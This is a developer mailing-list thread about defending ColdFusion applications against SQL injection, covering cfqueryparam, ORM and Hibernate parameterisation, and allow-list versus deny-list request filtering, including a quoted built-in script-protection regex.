>I can't vouch for php, .Net but at least in the Java world ORM reduces that >risk to nil. And its built into the ORM, so if the ORM can't work out your >polymorphic function in the database then how does it do it? php is as ColdFusion and Java; you can use a plain query string or use a parametised statement / prepared statement. If you use the prepared statement, you are protected from SQL injection (unless your SQL is running some code on the db that takes your input and runs it as dynamic SQL, of course ;). I think the main trouble with cfqueryparam is that it has not been pushed enough in the documentation and in books. This is why reams of application are not using it - the people writing the queries did not know any different. I would say the same is true of php and prepared statements though I have not enough experience in php to vouch for that. ORM is brilliant and hibernate appears to be great news for CF9. However, I believe that ORM is an application design *choice* and not something to be forced by the language (therefore hibernate will not interfere with cfquery I presume. That said, I think that if CF could make use of hibernate's data mapping knowledge to rewrite a plain query to be a parametised one, that would be great news indeed. I think that is what Andrew is getting at - if it could be done efficiently and without configuration or convention that would have to be welcome. A question for anyone who knows hibernate then; does it require configuration per database, rely on convention or does it query the schema to generate its mappings automatically? Dominic

So for six months you've known the feature is coming yet you're still arguing about it now? Do you just like wasting people's time? > Man your about 6 months late with that news.... > -- mxAjax / CFAjax docs and other useful articles: http://www.bifrost.com.au/blog/

No I am not arguing about it, I am saying that there is no reason that ColdFusion could not do what I said it could. It only means that with the release of ColdFusion 9, it is more of a possibility that SQL Injection will become a thing of the past for ColdFusion. It doesn't excuse the fact that when cfqueryparam was introduced, it couldn't have done something like this a long time ago. The argument came about because people believed it was not possible for ColdFusion to do this stuff under the hood, the reality was that it could have a long time ago. It just never was a request or thought about before. If you read anything I have said, you would see I am not arguing about it. But making a statement that it was and could have been possible. Nothing more nothing less. It was everyone else who disagreed, well almost everyone else. -- Senior Coldfusion Developer Aegeon Pty. Ltd. www.aegeon.com.au Phone: +613 9015 8628 Mobile: 0404 998 273 So for six months you've known the feature is coming yet you're still arguing about it now? Do you just like wasting people's time? > Man your about 6 months late with that news.... > -- mxAjax / CFAjax docs and other useful articles: http://www.bifrost.com.au/blog/

There are always trade-offs. Everything you add is a few (or more) cycles, and you've got to at least sorta aim for optimization (if ambiguously). Like, the hibernate stuff seems plenty fast to me right now, but what happens when I toss a ton of requests at it, or use large tables or something? It would be cool to have a switch to turn it on tho, and leave it on by default.  :-) ----- Excess quoted text cut - see Original Post for more -----

Well at the end of the day, I am currently using hibernate in ColdFusion thanks to Joe Reinhart I think is the one I am using. But I now plenty of people are looking into it at the moment. I have even looked at using GORM in Coldfusion, to help with DDD. But haven't had the time to investigate as of yet. But I am very happy to even just use POJO's for now. -- Senior Coldfusion Developer Aegeon Pty. Ltd. www.aegeon.com.au Phone: +613 9015 8628 Mobile: 0404 998 273 There are always trade-offs. Everything you add is a few (or more) cycles, and you've got to at least sorta aim for optimization (if ambiguously). Like, the hibernate stuff seems plenty fast to me right now, but what happens when I toss a ton of requests at it, or use large tables or something? It would be cool to have a switch to turn it on tho, and leave it on by default.  :-) > No I am not arguing about it, I am saying that there is no reason that > ColdFusion could not do what I said it could. It only means that with the > release of ColdFusion 9, it is more of a possibility that SQL Injection will ----- Excess quoted text cut - see Original Post for more ----- everyone ----- Excess quoted text cut - see Original Post for more -----

> Well at the end of the day, I am currently using hibernate in ColdFusion > thanks to Joe Reinhart I think is the one I am using. But I now plenty of > people are looking into it at the moment. Hibernate is easy to use with CF8 and Java.  Few lines of code. Now, CF objects and hibernate is another matter.  :-) The first thing I did was hook up HibernateTools (DB reverse engineering into POJOs or HBMs), but I didn't feel that was right for the majority of CF devs. And Having to restart things to see changes and whatnot?  Neh.  Crazy classloading-ness?  Neh. Hooking into a java-based model?  Sure.  Taking advantage of all the awesome java tools?  Priceless. But it ain't CF, per-se.  Not that that matters, of course, I just decided I wanted it to, for kicks. > I have even looked at using GORM in Coldfusion, to help with DDD. But > haven't had the time to investigate as of yet. But I am very happy to even > just use POJO's for now. Right on.  Looks like a GORM-ish deal wouldn't be hard to rock with about any ORM. When you talk about DDD, how are you representing the domain?  Are you using a modeling language? Thanks, DeN -- Nothing except the mint can make money without advertising. Thomas B. Macaulay

LoL... At the end of the day I see hibernate as a great tool, and hasn't been till recently that I discovered how easy it is to use. Not perfect or as good as GORM... But hey I am not complaining... -- Senior Coldfusion Developer Aegeon Pty. Ltd. www.aegeon.com.au Phone: +613 9015 8628 Mobile: 0404 998 273 > Well at the end of the day, I am currently using hibernate in ColdFusion > thanks to Joe Reinhart I think is the one I am using. But I now plenty of > people are looking into it at the moment. Hibernate is easy to use with CF8 and Java.  Few lines of code. Now, CF objects and hibernate is another matter.  :-) The first thing I did was hook up HibernateTools (DB reverse engineering into POJOs or HBMs), but I didn't feel that was right for the majority of CF devs. And Having to restart things to see changes and whatnot?  Neh.  Crazy classloading-ness?  Neh. Hooking into a java-based model?  Sure.  Taking advantage of all the awesome java tools?  Priceless. But it ain't CF, per-se.  Not that that matters, of course, I just decided I wanted it to, for kicks. > I have even looked at using GORM in Coldfusion, to help with DDD. But > haven't had the time to investigate as of yet. But I am very happy to even > just use POJO's for now. Right on.  Looks like a GORM-ish deal wouldn't be hard to rock with about any ORM. When you talk about DDD, how are you representing the domain?  Are you using a modeling language? Thanks, DeN -- Nothing except the mint can make money without advertising. Thomas B. Macaulay

>But hey I am not complaining... Who are you, and why are you using Andrew's email address? LoL... At the end of the day I see hibernate as a great tool, and hasn't been till recently that I discovered how easy it is to use. Not perfect or as good as GORM... But hey I am not complaining... -- Senior Coldfusion Developer Aegeon Pty. Ltd. www.aegeon.com.au Phone: +613 9015 8628

----- Excess quoted text cut - see Original Post for more ----- Unrelated, but isn't our government pretty much listening to all the chatter across the wires?  Pity to think we couldn't take advantage of that infrastructure. </joke> [...] > There is no way CF can guess the right datatypes to bind my function > arguments to when I call a polymorphic function in the database. This, I'm curious about.  Aren't there ways to use some type of introspection? Bah. I see your point, even if so, you end up having to understand every type of SQL, if from a different angle.  No easy java SQL parser to throw in, I guess. Still, there aren't *that* many DBs out there that would need to be supported... :-)p > I haven't mentioned this before because I do believe that filtering > request URLs is the wrong approach Care to elaborate on this? Even just a couple of rules in an apache conf file has helped quite a bit to eliminate these spam hits on CF, without impacting anthing else, that I'm aware of... are you thinking something closer to the network level? Every piece you add opens holes, and I used to sorta shun rewriting because of that, but, who am I kidding?  :-)  And it seems like rewriting is pretty common-place, so pretty vetted.  But I'd love to hear your take on the URL request filtering, Jochem! :Denny -- Few of the many wise apothegms which have been uttered have prevented a single foolish action. Thomas B. Macaulay

Actually, That should have been the reverse on URL filtering:-( In other words, I should or could write a filter to do the checking of SQL injections. Sorry my bad there. But it is only one way to do it. Anyway as I do grails work I dug this link up for you all... http://docs.codehaus.org/display/GRAILS/Security So it is possible to do under the hood, now I can't vouch for Transfer but I do know Mark would have used cfqueryparam. Now as it is written in ColdFusion in most parts, it does take care of the fact as a developer I don't need to worry about the SQL injection as I am confident that Transfer has taken care of it for me. That is a typical example, how ColdFusion can and should do it under the hood. And take particular notice how the data is escaped when committing to the database. -- Senior Coldfusion Developer Aegeon Pty. Ltd. www.aegeon.com.au Phone: +613 9015 8628 Mobile: 0404 998 273 > Andrew Scott wrote: >> Ever heard of IP spoofing? Sure you need to complain about it, but the one >> thing they need to do is track the packets. > > IP spoofing is really only a significant problem with UDP. With TCP any > decent ISP will catch spoofs in their egress filters. Even your cheap, > Taiwanese black box NAT router at home will stop spoofing for TCP > because it won't be able to match the NAT state. Unrelated, but isn't our government pretty much listening to all the chatter across the wires?  Pity to think we couldn't take advantage of that infrastructure. </joke> [...] > There is no way CF can guess the right datatypes to bind my function > arguments to when I call a polymorphic function in the database. This, I'm curious about.  Aren't there ways to use some type of introspection? Bah. I see your point, even if so, you end up having to understand every type of SQL, if from a different angle.  No easy java SQL parser to throw in, I guess. Still, there aren't *that* many DBs out there that would need to be supported... :-)p > I haven't mentioned this before because I do believe that filtering > request URLs is the wrong approach Care to elaborate on this? Even just a couple of rules in an apache conf file has helped quite a bit to eliminate these spam hits on CF, without impacting anthing else, that I'm aware of... are you thinking something closer to the network level? Every piece you add opens holes, and I used to sorta shun rewriting because of that, but, who am I kidding?  :-)  And it seems like rewriting is pretty common-place, so pretty vetted.  But I'd love to hear your take on the URL request filtering, Jochem! :Denny -- Few of the many wise apothegms which have been uttered have prevented a single foolish action. Thomas B. Macaulay

> I haven't mentioned this before because I do believe that filtering >> request URLs is the wrong approach > > Care to elaborate on this? Denstar, dig out your neo-security.xml file.  In my Windows CF8 standalong install it is located in C:\ColdFusion8\lib\neo-security.xml Look at the following section:    <var name="CrossSiteScriptPatterns">     <struct type="coldfusion.server.ConfigMap">      <var name="<\s*(object|embed|script|applet|meta)">        <string><InvalidTag</string>      </var>     </struct>    </var> When you check the "Enable Global Script Protection" check box on the Settings page of ColdFusion Administartor, requests are filtered if anything in the Form, URL, CGI, or Cookie scope matches this regex: "<\s*(object|embed|script|applet|meta)" What Jochem is saying, is to add to that regex to filter for whatever else you want and enable that setting. While I agree with Jochem that request filtering is NOT the appropriate way to secure your application, this is a rather slick approach. Also note, this is NOT rewriting.  It is not happinging at the network level, nor is it happening at the web server level (Aache, IIS).  The requests are filtered when they reach ColdFusion. ~Brad

----- Excess quoted text cut - see Original Post for more ----- >~Brad

I'm doing the request filtering in apache so that it never even bothers my CF engine with the request, but I was wondering if Jochem didn't like the filtering for a reason. I wouldn't rely on it alone in any way, shape or form, but just cutting down on the "spam" hits on the application seems like a worthy deal. Doing it at the network level would be even faster and less intensive application-wise, but I'm wondering if there's a problem with the very idea that I haven't thought of. Accidentally removing legitimate traffic, or just trading one weakness for another-- something like that. We need to be preventing this stuff on every level, layered like an onion, as someone said earlier. I was not endorsing request filtering as a sole means of protection, for the record.  :-) Gracias for the info on what turning on global script protection actually is! :Den -- He had a wonderful talent for packing thought close, and rendering it portable. Thomas B. Macaulay ----- Excess quoted text cut - see Original Post for more -----

denstar wrote: > >> I haven't mentioned this before because I do believe that filtering >> request URLs is the wrong approach > > Care to elaborate on this? Filtering means "allow unless it matches". A security measure should be "deny unless it matches". Jochem

----- Excess quoted text cut - see Original Post for more ----- So long as it's simple list of matches, right?  If the list is too complicated, you get the Godel's Theorem effect, neh?  :-) Heh, I can see it now-- MG3 not only auto-generates your controllers and XML and whatnot, but using the power of introspection, it adds rewrite rules to your vhost conf file per event, with type-binding! That actually sounds pretty cool. See, I'm wondering if this is closer to searching than security, per-se.  Sorta thinking (it's getting late, so bear with me :) of a lame example: I could parse a paragraph looking for every word that's good, and tossing out the swear-words-- or just look for swear-words. Which is going to be faster?  Which list is longer? Maybe that analogy is broken.  Probably.  Hmm... Yup, cause you'd have to throw in that they could make up new curses as well, without you even knowing.  Hmm... Well, I'm sure you get the point I'm trying to make by now (which could be a non-point), but I'll elaborate further, because I'm not sure if it is a point :-)p I'd want the lowest-level, most used to be the fastest checks, and the highest level, least used to be the slowest, most thorough.  In an ideal world, you could run the highest all the time, but that might be a fake world, because the more encrypted you get, the longer it takes, not only to break, but to encode and decode.  Maybe.  Probably another broken analogy (and a lie ta boot), but whatever.  :) Hmm... if you've got access to all the data at each level (what to allow, say, in rewrite rules, or query parameters, etc.), I don't see why you couldn't lock it down to only what's possible, vs. what could be.  It would take organization tho.  Borg-like, Terminator-making organization.  :-) Or maybe you've got a simple solution, to how one would limit URL requests to only allowable values?  I can't see anything short of automation, but that's why this is taking so long.  Probably overlooking something simple. Eh. What's your scenario, to help me grok this here, Jochem?  Search Engine Safe?  Ha!  That's simple!  Force a pattern-- string([A-z]), number, string!  Easy. Is that a solve? Damn.  This, by now dead, horse is freaking beat.  I'm going to sign off now... -- slowly steps away from the keyboard... --

denstar wrote: ----- Excess quoted text cut - see Original Post for more ----- I don't think simple solutions exist. The closest I have seen that still was simple yet appeared to be somewhat effective was a company that did something akin to hungarian notation. They had all their variables typed like user_uuid and article_int and they did type / bounds checking in the webserver, throwing security errors on every type mismatch or occurence of a variable without the type declared. Jochem

Hello folks: I am sorry about the thread jump here, but any ASP gurus out there on this discussion list? In the past week, I have been fanatically patching our old CF code and applying CFQUERYPARAM wherever it applies.  Additionally, I also implemented the SQL Injection Blocker written by Gabriel and Mary Jo.  It is extremely helpful. However, a big chunk of our old application is written in ASP.  It was an off-the-shelf content-mangement-system which we plan to replace soon.